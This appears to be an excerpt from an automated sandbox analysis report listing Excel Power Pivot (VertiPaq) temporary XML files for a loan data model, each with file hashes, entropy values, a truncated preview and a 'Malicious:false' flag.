                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Model.28.cub.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5428), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8608
                                                                                                Entropy (8bit):5.1201328604428005
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xI+07C4/qjlLN1OGX2QOGX2TOGX2yOGX26OGX2cOGX2BOGX2kwOGG2yOGX2jOGX8:7NLXOGX2QOGX2TOGX2yOGX26OGX2cOGK
                                                                                                MD5:C1CD3D917541DC1E2CD943A64CB4E8E9
                                                                                                SHA1:4431EDB56167C701FEF5C680A3CEEF58D5DDF9B0
                                                                                                SHA-256:87584721921C4FD2A71A86A4A80FE346B3BA1B077BCB1A9F7918DF7FADBB79A1
                                                                                                SHA-512:B739A1E9485465198DFA8B86142ADC71E427E34EECE5F5B46087538829F529D0AA8F995886DDA65859A59677BF427822544E9D4512988D15036DA903DAB5D9B5
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Model.6.cub\Loan.43.det.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7774), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7774
                                                                                                Entropy (8bit):5.177591793358506
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bhxu4ECRwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybzuvAk:xI+RE1y9iV8a2Suv5
                                                                                                MD5:4D2A4466553E44D4B42D909BAB4AACF5
                                                                                                SHA1:A18A747916C200EC5C93E425B03E6C55436FDFB5
                                                                                                SHA-256:D6AB6CBB2DD2F888CFCCCFF766FD31F106077E9790C3585007E1E85CA9930C70
                                                                                                SHA-512:CD190DDC73E5C8192EF48FC626AF80641EC588F7B1AAFE694A75E9E6A8411E52F9F5C9E234BC6A2116F8F8653D0F5F602872C2EEB25A7B7E3353EDFE23642631
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Model.6.cub\Loan.5.det\Loan.26.prt.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3105), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3105
                                                                                                Entropy (8bit):5.213440899690661
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8lIaeaTGAAw48UpWypzhJGJdAJQAJw/nJj/nJcREK:07vexwKUYp0i4nq+0BhxIklAjp+bDuuQ
                                                                                                MD5:06EDAA7127285A4CA21F4A7519BAF7FA
                                                                                                SHA1:598CEB111C4FBCF6D3CB4C19F0761675321069DD
                                                                                                SHA-256:85B85A210D305A2B4C56849493F5ABF61A7A148D37B6F74E4A94E2B94FC905F4
                                                                                                SHA-512:3A25E06BE78F93F1C0038D64DDD92AC30C281EB710AD85141B25E00FBEC6366936A25D3C2E1FFF72F402F5BDC6EA9BF97D72C8672A1C58500B5F16FBBC131E1C
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Model.6.cub\Loan.5.det\Loan.5.prt\info.26.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (405), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):405
                                                                                                Entropy (8bit):4.993288092656503
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:C4+DnFro8i9xTDyAGTrPQkQDQf1gwP7k9FD9FwJ:C4+Bo8SCAGXZF7AA
                                                                                                MD5:72DB76B454A91BB3D962E5A79267C8FD
                                                                                                SHA1:99A5E278FBEB416D2531A13CDDF389DDDAE0AD25
                                                                                                SHA-256:37FF7B0F1A46AED4F653EA274F583903E9884803AD97C0566EC08B8BBCE07442
                                                                                                SHA-512:9766D1AE7F50E8658520909A036A66FD7395D51F5F1F05B74358EC774527B7047BE1DB7D14E4DFD1EC447E0D67AD87568384442309AC0C6B9C619EF9E52A5951
                                                                                                Malicious:false
                                                                                                Preview:<Partition xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>26</DataVersion><RigidAggVersion>-1</RigidAggVersion><FlexAggVersion>-1</FlexAggVersion><DataIndexVersion>-1</DataIndexVersion><RigidIndexVersion>-1</RigidIndexVersion><FlexIndexVersion>-1</FlexIndexVersion></Partition>

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Model.6.cub\MdxScript.10.scr.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (2467), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15807
                                                                                                Entropy (8bit):5.0945374228799825
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xI+K+FClC0YCndOYCnpuYCnF/yanb6anbfanbqanbEanp:7/S/b3bobnbFp
                                                                                                MD5:81F1362E788696B9D32171B838B92FCD
                                                                                                SHA1:F7B83D4C010F6E810542F2692D10D61B96FE35F8
                                                                                                SHA-256:993BF6EB985E0F158C2BA8CD89BE0640C684F6FFA19F5428340F3D1BFA80A761
                                                                                                SHA-512:93BBC9D42A27E6514F7946CA50F3A7578AB87FF2AA1F18CD788F1A14020408963C685ED74BE7C9BE66408E3EAC2B3FA81FF21DF9FC272D1FF02863F3F12F0DBD
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Model.6.cub\info.28.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):169
                                                                                                Entropy (8bit):4.934836367190815
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:5WqDmNGzE+tRnJMgTTntViJS4RKbumd0jViJS4RKbuviyiKb:57mUA+DnJH3ic4sroVic4subiKb
                                                                                                MD5:0206F0CCEAE1CF9D86B29F4222B99C0F
                                                                                                SHA1:D7C8F3C8FF1FA346CE58849D9847468E0DC3CCCB
                                                                                                SHA-256:486A513B97BD07EC88CA576FE4C4D6BB03CDD356C0E09E67902F87852236A14B
                                                                                                SHA-512:E50DEDBCDBE7D9023D868B9B17ADAE9E44E72DF85B61B1591702063D32961BF4C78F683237838BB706904C8F1ED311EDDF9BA528400A2D7B211F617ACD7C8691
                                                                                                Malicious:false
                                                                                                Preview:<Cube xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/>

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3873
                                                                                                Entropy (8bit):5.130897503481441
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0BhqHNh7RnHi8VsU7H9/P26iJyFFNA4:xI9CT6NB
                                                                                                MD5:01D4E7137A531F7E67AA7EDA157290A7
                                                                                                SHA1:469AD0BA07AC9DFAF49CEA98013322FE2CB2C9F0
                                                                                                SHA-256:24F01B50973AE445D4B3E26109B4FB42024F9A93FE11A3F1AB2466FD976BC340
                                                                                                SHA-512:61CC31FA62FE9D42B22C9AB0BFD82357D211D6F4CF2451FA486B34814DD040F2B1E8E684B71C64C3FE878945F1398BCA192C81DD5965FDCDDE0EC9C4463C1BCF
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Beginning Balance.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8705), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8705
                                                                                                Entropy (8bit):5.142542744053374
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:lOMckwYWKzDUTnKjivTnKjBDCFBTWWKzDUTnKjivTnKjBDGFBhN:mK4KWKyVK4KWK2D
                                                                                                MD5:A0BC45B1D37AFAAAD38B4290EE836E2E
                                                                                                SHA1:F2A069E0C9DD00A975E8F89893A60B5F7AA1306E
                                                                                                SHA-256:FF5286C68A1C5BEC06FDD556B6D2CAD95B094AD4392893C87CC7F1EABDA72582
                                                                                                SHA-512:A683AA3559841E10E3F9EDCCBE62B192818539602ED90C6B067D144F1FA4F6AF5A39751487EA5CA745A605C7E98F3AE94F233B802F3D6B756D9CFE26709CB3EC
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Beginning Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Ending Balance.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8699), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8699
                                                                                                Entropy (8bit):5.143230873720358
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:bOMckwYWKzDUTnKjivTnKjBDgFBTWWKzDUTnKjivTnKjBDEFBhN:cK4KWKIVK4KWKMD
                                                                                                MD5:2D4A441B579EB1D6A4F79C093EA4F340
                                                                                                SHA1:42B00F10F9C114F1AA6918046B7C991F3DB45421
                                                                                                SHA-256:BE6BA40FAEF7CD4986179CA2193C8059FF0B4D9D3D399136E61610A97DBFF88A
                                                                                                SHA-512:C49C338ABABCE187E40244E562ED2C5FE2B28E352FB296732462DA2A580A7B0762C8929F70705CD770A379E899CBAB90E44A9628E5AB437D9EB2804832D263D3
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Ending Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSi

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Interest.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8678), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8678
                                                                                                Entropy (8bit):5.139777538262371
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:KOMckwYWKzDUTnKjivTnKjBDZFBTWWKzDUTnKjivTnKjBDxFBhN:xK4KWKLVK4KWKzD
                                                                                                MD5:DFD350B64B126A92B0C394896EC776AC
                                                                                                SHA1:3B03338C5405052E55B43CA991BE416E1403AA4C
                                                                                                SHA-256:7496660D3587EB4B442863F44D44D2483907F8202C6C60DE03C42FBE856DA8B8
                                                                                                SHA-512:03E84601C918967687BE15BFC80BABBF9E299C3B13D4B2E7B22E1BA05530F2BB25D5D1BFD1F76AE501599C454926BA5F191D5DB955167C5C11CD2F9D6227D758
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Interest" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Payment Date (Month Index).2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8728), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8728
                                                                                                Entropy (8bit):5.145646850532849
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:rO7kwYWKzD/TnKjivTnKjBDUFBTWWKzD/TnKjivTnKjBDIFBhN:cK7KWKAVK7KWKkD
                                                                                                MD5:2B3E6A67EDF9FB3D39E6BB66B2F0DA71
                                                                                                SHA1:FA381A14C2A88039C84769BC44D97F6A8ADD1E3C
                                                                                                SHA-256:C2C3362E5BDF6C4995D9DB5A3A12C121231D43D573652260295DAA9139D07E59
                                                                                                SHA-512:7C406E693DBBA011B23BC05BDEF04C90A8DC4A820BCC88E55704E6A74F3C68AD5FB60959706CB4B065BB4B09EAD6788D79D2294276576230B1562C96E586BBEE
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month Index)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Payment Date (Month).2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8710), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8710
                                                                                                Entropy (8bit):5.145241883891935
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:PO7kwYWKzD/TnKjivTnKjBDEFBTWWKzD/TnKjivTnKjBD4FBhN:IK7KWK0VK7KWKoD
                                                                                                MD5:60D201EB6F1F8BC9E6A4F1E1EF6B9856
                                                                                                SHA1:BC1DB52991442BC1D90C6502B1AB09A02997CE41
                                                                                                SHA-256:42437FF02D8EB6EE7E27A454CA4370F802EDBB6B09C810F8D9A320E6EBA64D35
                                                                                                SHA-512:6FC62430598FE282047749C48D36EB15AC87F0CE92FAF408459656CE738E3F1C3356ECACBA4C395EA9E2A4AF40251B591C15A8A2D91F5AE3E6BF8120F3FF30CA
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Payment Date (Quarter).2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8712), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8712
                                                                                                Entropy (8bit):5.146229430038961
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:FOdkwYWKzDOTnKjivTnKjBDWFBTWWKzDOTnKjivTnKjBDqFBhN:gKCKWKSVKCKWKWD
                                                                                                MD5:6481304229D0E67D21081F5139F3BB9A
                                                                                                SHA1:28D2E52BC9508F1F01B406CB7977A888BB2BE42E
                                                                                                SHA-256:43CD447FD72859532C6AEC1703663AF86A6F8D22DE8B2064D432FB81ABC8A274
                                                                                                SHA-512:7FF050B810E8C8786AB3E53DDEAC50738129CE78873D5A31C25363B859958BD4F5B052DDD9F7D2A0363C01CF1BC159249FCAD2934041B4AABD0F421CE848673C
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Quarter)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">7</Records><RecordsPerSegment xsi:type="xsd:long">4</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Payment Date (Year).2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8707), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8707
                                                                                                Entropy (8bit):5.147253860702353
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:oODkwYWKzDSTnKjivTnKjBDzFBTWWKzDSTnKjivTnKjBDLFBhN:3KWKWKJVKWKWKBD
                                                                                                MD5:38BDCE719E883F43DC1EFF9597DCD80D
                                                                                                SHA1:CA835401C95F4C63337FD010758A1ACCD0F5677F
                                                                                                SHA-256:75FB8A6D98E3162B694AE72FE55170EC9AD9EDB2B499C7899F3C779B52FE62B9
                                                                                                SHA-512:D497D88382795F460E7EA3ED1E08CB9C716A36673ED5D9B49E1F4BB064DBDF95FDF51A97E3845A572E29573138E31B39366A3547ABC7687C15CD954EE4B6705B
                                                                                                Malicious:false
